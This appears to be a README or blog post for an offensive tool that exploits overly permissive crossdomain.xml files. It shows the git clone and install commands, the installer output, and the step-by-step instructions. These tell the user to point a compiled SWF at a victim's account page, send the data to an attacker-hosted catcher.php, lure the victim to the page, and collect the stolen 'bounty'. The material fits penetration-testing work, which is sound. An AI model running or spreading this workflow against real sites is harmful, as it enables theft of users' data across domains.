While this is not much of a framework just yet, everything you need to exploit overly permissive crossdomain.xml files is here.
Kali
root@kali:~# git clone https://github.com/sethsec/crossdomain-exploitation-framework.git
root@kali:~# cd crossdomain-exploitation-framework
root@kali:~/crossdomain-exploitation-framework# ./install.sh
root@kali-Preso:~/crossdomain-exploitation-framework# ./install.sh
This install script will perform the following actions:
1) Download and install openjdk-6-jdk and php5
2) Download and install Adobe Flex (A 230mb download)
3) Drop a php "catcher.php" script in the web root
4) Download Gursev Kalra's ActionScript3 template
5) Provide you with my additional ActionScript3 examples
6) Configure your Apache instance to support SSL
7) Restart your Apache instance
8) Give you some guidance on how to compile your ActionScript3 into a SWF
Unrelated to compiling SWF files, this script will also copy the
http-crossdomain.nse NMAP script into /usr/share/nmap/scripts/
so that you can use it. I'll remove this once the nse gets added
to NMAP.
Before we get started, here is your opportunity to deviate from
the default file locations.
To accept the default settings, just hit enter:
* Flex Install Location [/opt/flex]:
* Location for catcher.php [/var/www/crossdomain]:
* Location for xdx.html [/var/www/crossdomain]:
* Location for ActionScript3 templates [/home/seth/crossdomain-exploitation-framework/actionscript-templates]:
<snip>
*****************
* Next Steps *
*****************
1) Edit the /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as file
a) Specify the target URL
Something like: http://vulnerable.com/account/settings
b) Specify the server and page you want to send the data to:
Something like: http://attacker/crossdomain/catcher.php
2) Compile the file:
a) /opt/flex/bin/mxmlc /home/seth/crossdomain-exploitation-framework/actionscript-templates/XDomainXploit.as --output /var/www/crossdomain/XDomainXploit.swf
3) Edit /var/www/crossdomain/xdx.html and make sure it is pointing to the right SWF file
4) Get your victim to navigate to http://<your-hostname-or-ip>/<path>/xdx.html
5) Collect your bounty at /tmp/crossdomain_bounty.txt
* Additional templates have been provided, and are located in the following directory:
* /home/seth/crossdomain-exploitation-framework/actionscript-templates
Good luck!